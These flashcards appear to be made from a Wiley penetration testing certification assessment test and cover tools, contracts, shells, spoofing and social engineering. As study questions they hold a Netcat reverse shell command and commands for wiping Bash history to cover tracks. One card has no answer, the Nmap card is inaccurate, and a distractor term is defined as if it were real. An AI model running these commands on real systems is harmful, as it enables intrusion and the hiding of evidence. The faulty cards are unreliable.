Wiley - Assessment Test missed/items Flashcards

1
Q

Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

  • SQL injection
  • VM escape
  • Buffer overflow
  • Cross‐site scripting
A

VM Escape

Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You’ll learn more about all of these vulnerabilities in Chapters 5 and 9.

2
Q

NDA

A

A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.

3
Q

SOW

A

An SOW is a statement of work, which defines what will be done during an engagement.

4
Q

MSA

A

An MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work).

5
Q

Noncompete

A

Noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.

6
Q

Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

  • ZAP
  • Nessus
  • SonarQube
  • OllyDbg
A

The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing.

7
Q

ZAP

A

The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing.

8
Q

Nessus

A

Vulnerability Scanner

Nessus is designed to identify and report on potential vulnerabilities in computer systems, networks, and applications. It performs this task by scanning for open ports, detecting the services running on those ports, and then testing those services for known vulnerabilities.

9
Q

SonarQube

A

SonarQube is a comprehensive code quality assurance tool designed to analyze and improve the quality, security, and maintainability of source code. SonarQube is a static application security testing (SAST) tool.

10
Q

OllyDbg

A

OllyDbg is a powerful, user-friendly debugger and disassembler primarily designed for reverse engineering and debugging applications on Microsoft Windows.

11
Q

Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

  • Record the details in the penetration testing report.
  • Remediate the vulnerability that allowed her to gain access.
  • Report the potential compromise to the client.
  • No further action is necessary because Renee’s scope of work is limited to penetration testing.
A

Report the potential compromise to the client.

12
Q

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

  • Black box
  • Authenticated
  • Internal view
  • External view
A

An authenticated, or credentialed, scan provides the most detailed view of the system. Black‐box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.

13
Q

Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?

  • history -c
  • kill -9 $$
  • echo "" > /~/.bash_history
  • ln /dev/null ~/.bash_history -sf
A

ln /dev/null ~/.bash_history -sf

Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.

14
Q

Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

  • Nmap
  • Nikto
  • Wireshark
  • CeWL
A

Nikto

15
Q

Nikto

A

Nikto is a free, open-source web server scanner designed to identify and report on potential vulnerabilities and misconfigurations in web servers.

16
Q

CeWL

A

The Custom Wordlist Generator (CeWL) is used to spider websites for keywords.

17
Q

Wireshark

A

Wireshark is a powerful, free, and open-source network protocol analyzer that is widely used for capturing, displaying, and analyzing network traffic.

18
Q

Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

  • OSINT
  • HSI
  • Background
  • None of the above
A

OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test.

19
Q

Which of the following activities constitutes a violation of integrity?

  • Systems were taken offline, resulting in a loss of business income.
  • Sensitive or proprietary information was changed or deleted.
  • Protected information was accessed or exfiltrated.
  • Sensitive personally identifiable information was accessed or exfiltrated.
A

Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.

20
Q

Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

  • 256
  • 1,000
  • 1,024
  • 65,535
A

By default, Nmap will scan the 1,000 most common ports for both TCP and UDP.

21
Q

Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

  • Penetration testing
  • Vulnerability scanning
  • Remediation
  • Threat hunting
A

Threat hunting

Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.

22
Q

Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

  • Started a reverse shell using Netcat
  • Captured traffic on the Ethernet port to the console via Netcat
  • Set up a bind shell using Netcat
  • None of the above
A

Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell.

23
Q

Reverse Shell

A

A reverse shell is a type of cyber attack that allows an attacker to gain remote access to a victim’s machine by establishing a connection from the victim’s system back to the attacker’s system. This method circumvents traditional security measures, such as firewalls, which often filter incoming connections but may allow outgoing connections more freely.

How Reverse Shells Work
1. Connection Initiation: In a reverse shell scenario, the victim’s machine initiates an outbound connection to the attacker’s machine. This is in contrast to a traditional bind shell, where the attacker connects directly to the victim’s machine.
2. Exploitation: Attackers typically exploit vulnerabilities in applications or use social engineering techniques (such as phishing) to execute malicious scripts on the victim’s system. Once executed, these scripts create a connection back to the attacker’s server.
3. Command Execution: After the connection is established, the attacker can send commands to be executed on the victim’s machine, effectively gaining control over it as if they were physically present.

Netcat is often used with reverse shells.

24
Q

Bind Shell

A

A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine. Here are the key aspects of bind shells:

Definition
A bind shell listens on a specific port for incoming connections. Once a connection is established, it provides the connecting user with a command-line interface (shell) on the target system, allowing them to execute commands remotely.

How Bind Shells Work
* Listening Service: The target machine runs a service (often created using tools like Netcat or custom scripts) that listens on a designated port for incoming connections.
* Connection Initiation: The attacker connects to this listening port from their own machine, effectively gaining access to the shell of the target system.
* Command Execution: Once connected, the attacker can execute commands as if they were physically present at the target machine.

Use Cases
* Remote Administration: Bind shells can be used legitimately by system administrators for remote management of servers and devices. They allow administrators to perform tasks such as monitoring system performance, updating software, and managing configurations.
* Malicious Activity: Attackers may use bind shells to gain unauthorized access to systems, execute commands, and potentially install malware.

Security Implications
* Exposure Risk: Since bind shells listen for incoming connections, they can expose the target machine to unauthorized access if not properly secured. If an attacker discovers an open port, they can connect and take control of the system.
* Firewall Challenges: Many firewalls block incoming connections by default, making bind shells less effective in environments with strict security measures. This limitation often leads attackers to prefer reverse shells instead.

25
Q

Difference between Bind Shell and Reverse Shell

A

A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine.

In contrast to bind shells, reverse shells initiate a connection from the victim’s machine back to the attacker’s machine. This method is often preferred because it can bypass firewalls that block incoming connections but allow outgoing ones.

26
Q

VLAN Double tagging

A

A VLAN double-tagging attack is used against 802.1Q interfaces. The first tag is stripped, allowing the second tag to be read as the VLAN tag for the packet.

27
Q

Alaina wants to conduct an on‐path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

  • ARP spoofing
  • IP proofing
  • DHCP pirating
  • Spoofmastering
A

ARP Spoofing

Alaina would choose ARP spoofing over IP proofing for its effectiveness in local networks, ease of execution, and ability to exploit the inherent trust in ARP communications to carry out her on-path attack.

28
Q

IP Proofing

A

Definition: IP proofing generally refers to techniques used to verify the authenticity of IP addresses in network communications, particularly in the context of preventing IP spoofing. IP spoofing involves sending packets from a false source IP address to impersonate another device or user.

Purpose: The main goal of IP proofing is to ensure that the source IP address of incoming packets is legitimate, thereby preventing unauthorized access and attacks such as DDoS (Distributed Denial-of-Service).

Techniques:
* Ingress Filtering: This technique checks incoming packets against a list of valid IP addresses, blocking those that do not match.
* Authentication Protocols: Implementing protocols that require mutual authentication can help verify the identity of devices communicating over the network.
* Packet Filtering: Analyzing packets for inconsistencies in their headers can help identify and block spoofed packets.

29
Q

Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

  • Authority
  • Scarcity
  • Likeness
  • Social proof
A

Social proof

Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.

30
Q

Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on‐site via the network?

  • Shoulder surfing
  • Kerberoasting
  • USB key drop
  • Quid pro quo
A
31
Q

Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismetcapture

  • An encrypted file
  • A hashed file
  • A SUID file
  • A SIP file
A

A SUID file

The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner.

32
Q

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

  • Nmap
  • Traceroute
  • regmon
  • Whois
A

Whois

33
Q

Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?

  • Run system-detect-virt.
  • Run ls -l /dev/disk/by-id.
  • Run wmic baseboard to get manufacturer, product.
  • Run dmidecode to retrieve hardware information.
A

Run wmic baseboard to get manufacturer, product.

All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool.